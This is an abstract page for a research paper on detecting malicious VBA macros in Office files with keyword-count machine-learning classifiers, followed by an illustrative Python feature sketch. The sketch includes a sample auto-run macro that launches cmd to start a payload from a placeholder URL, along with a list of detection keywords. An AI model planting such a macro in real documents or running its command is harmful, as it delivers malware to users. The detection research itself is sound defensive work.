OLE File Analysis and Malware Detection using Machine Learning

  • Journal of The Korea Society of Computer and Information
  • Abbr : JKSCI
  • 2022, 27(5), pp.149-156
  • DOI : 10.9708/jksci.2022.27.05.149
  • Publisher : The Korean Society Of Computer And Information
  • Research Area : Engineering > Computer Science
  • Received : March 18, 2022
  • Accepted : April 29, 2022
  • Published : May 31, 2022

Hyeong Kyu Choi 1, Ah Reum Kang 1

1 Pai Chai University

Accredited

ABSTRACT

Recently, there have been many reports of document-type malware, in which malicious code is injected into Microsoft Office files. Such code is often hidden by encoding it within the document, which allows document-type malware to bypass anti-virus programs easily. We found that the malicious code was inserted into Visual Basic for Applications (VBA) macros, a feature supported by Microsoft Office. The malicious code we identified included shellcode that runs external programs and URL-related code that downloads files from external URLs. We selected 354 keywords that appear repeatedly in malicious Microsoft Office files and defined the number of times each keyword appears in the body of the document as a feature. We then trained classifiers using the SVM, naïve Bayes, logistic regression, and random forest algorithms, which achieved accuracies of 0.994, 0.659, 0.995, and 0.998, respectively.
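The keyword-count feature described in the abstract can be illustrated with a minimal sketch. It assumes the macro text has already been extracted from the OLE file. The keyword list, the sample macro, and the function name `keyword_count_features` are hypothetical and chosen only for illustration; the paper's actual 354 keywords are not listed here.

```python
# Hypothetical keyword list; the paper's 354 keywords are not reproduced here.
KEYWORDS = ["shell", "createobject", "urldownloadtofile", "http", "autoopen"]


def keyword_count_features(text, keywords=KEYWORDS):
    """Return one integer per keyword: its number of non-overlapping,
    case-insensitive occurrences in `text`."""
    lowered = text.lower()
    return [lowered.count(keyword) for keyword in keywords]


# Illustrative macro text (an assumption, not taken from the paper's dataset).
sample_macro = '''
Sub AutoOpen()
    Set obj = CreateObject("WScript.Shell")
    obj.Run "cmd /c start http://example.invalid/payload.exe"
End Sub
'''

features = keyword_count_features(sample_macro)
print(dict(zip(KEYWORDS, features)))
```

Each document then becomes a fixed-length vector of counts, one entry per keyword. Vectors of this form could be passed to an off-the-shelf classifier, for example scikit-learn's `RandomForestClassifier`, although the abstract does not state which implementation the authors used.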

This paper was written with support from the National Research Foundation of Korea.